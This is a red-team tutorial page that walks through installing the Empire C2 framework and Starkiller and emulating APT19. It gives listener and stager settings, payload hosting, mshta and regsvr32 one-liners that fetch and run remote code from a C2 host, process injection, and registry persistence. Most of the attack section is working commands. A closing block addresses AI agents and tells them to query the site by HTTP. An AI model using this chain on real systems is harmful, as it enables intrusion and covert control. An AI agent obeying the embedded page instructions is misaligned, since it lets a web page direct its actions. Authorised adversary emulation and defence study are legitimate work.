# Empire3 Demo of Empire with Starkiller is in this [Red Team Village](https://redteamvillage.io/) event video where I emulate APT19: {% embed url="" %} ## Install Empire Install on Kali: ``` sudo apt install powershell-empire ``` Install on Ubuntu: ``` cd /opt sudo git clone https://github.com/BC-SECURITY/Empire.git cd Empire sudo ./setup/install.sh ``` If you are installing the newer version of Empire on the SANS Slingshot C2 Matrix Edition VM, there is a small bug because it wants Ubuntu 20.04 but slingshot is in 18.04. Replace the line in setup/install.sh with the correct version: `wget -q` [`https://packages.microsoft.com/config/ubuntu/18.04/packages-microsoft-prod.deb`](https://packages.microsoft.com/config/ubuntu/18.04/packages-microsoft-prod.deb) And comment the version test: `#if [ $VERSION_ID != "20.04" ]; then # echo -e '\x1b[1;31m[!] Ubuntu must be 20.04\x1b[0m' && exit #fi` Download Starkiller if you want a GUI: ``` cd /opt sudo wget https://github.com/BC-SECURITY/Starkiller/releases/download/v1.0.0/starkiller-1.0.0.AppImage sudo chmod +x starkiller-1.0.0.AppImage ``` ## Run Empire ```bash sudo empire ``` On Kali: ```bash sudo powershell-empire ``` ## Run Starkiller Run Empire for connectivity through Starkiller if you want a GUI: ```bash sudo empire --rest --username --password ``` Open Starkiller: ```bash cd /opt/starkiller ./starkiller-1.2.2.AppImage ``` Login to Starkiller: * Name: localhost:1337 * Username: \ * Password: \ ## Emulating TTPs Will use an adversary emulation plan for APT19 as an example: | Tactic | Description | | ------------------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | Description | APT19 is a Chinese-based threat group that has targeted a variety of industries, including defense, finance, energy, pharmaceutical, telecommunications, high tech, education, manufacturing, and legal services. | | Goal and Intent | Exist in the network to enumerate systems and information in order to maintain Command and Control to support future attacks. | | Command and Control | Commonly Used Port (T1043) - TCP port 80; Standard Application Layer Protocol (T1071) - HTTP; Deobfuscate/Decode Files or Information (T1140); Data Encoding (T1132) - used Base64 to encode communications to the C2 server | | Initial Access | Spearphishing attachment (T1193); Spearphishing link (T1192) | | Execution | PowerShell (T1086); User Execution; Hidden Windows (T1143) - used `-W Hidden` to conceal PowerShell windows by setting the WindowStyle parameter to hidden; Obfuscated Files or Information (T1027) - used Base64 to obfuscate commands and the payload; DLL Side-Loading (T1073) | | Discover | System Owner/User Discovery (T1033); System Information Discovery (T1082) System Network Configuration Discovery (T1016) | | Persistence | Registry Run Keys/ Start up Folder (T1060) - establishes persistence by setting the Registry key `HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Windows Debug Tools-%LOCALAPPDATA%\` | | Defense Evasion | Regsvr32 (T1117); Scripting (T1064) - downloaded and launched code within a SCT file to bypass application whitelisting techniques | ### Listeners Create Listener ```bash Type: http Name: http Host: http://10.0.0.187 Port: 80 BindIP: 10.0.0.187 Jitter: 0.5 StagingKey: georgy ``` ### Stagers Generate Stager HTA: ```bash Type: windows/hta Listner: http Base64: True Language: powershell Outfile: /tmp/Resume.hta ``` Generate Stager SCT: ```bash Type: windows/launcher_sct Listner: http Base64: True Language: powershell ``` Generate Stager DLL: ```bash Type: windows/dll Listner: http Arch: x86 Language: powershell OutFile: /tmp/launcher.dll Optional Fields Obfuscate: True ObfuscateCommand: Token\String\1 ``` Download the stagers to /tmp and serve with SimpleHTTPServer ```bash cd /tmp python -m SimpleHTTPServer 8080 ``` ### Initial Access Email with link to Resume.hta ### Execution Show execution of HTA file: ```bash mshta http://10.0.0.187:8080/Resume.hta ``` Migrate to another process with reflective PE Injection: ```bash See processes running: ps usemodule code_execution/invoke_reflectivepeinjection set ProcID: set DllPath: /tmp/launcher.dll ``` ### Discovery ```bash whoami usemodule situational_awareness/host/antivirusproduct usemodule situational_awareness/host/get_uaclevel usemodule situational_awareness/host/winenum ``` ### Persistence ```bash usemodule persistence/userland/registry set Listener: http ``` Open regedit HKCU\Software\Microsoft\Windows\CurrentVersion ### Defense Evasion Execution with regsvr32 and scripting. Created a shortcut called Chrome with Target set as: ```bash C:\Windows\System32\cmd.exe /c "C:\Windows\System32\regsvr32.exe /s /n /u /i:http:\10.0.0.187:8080\launcher.sct scrobj.dll" ``` ### Upload ```bash cd C:\Users\ upload /tmp/file shell C:\Users\\ ``` ## Other Resources * Using Empire with Starkiller: [How to from BC-Security](https://www.bc-security.org/post/an-introduction-to-starkiller) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://howto.thec2matrix.com/c2/empire.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.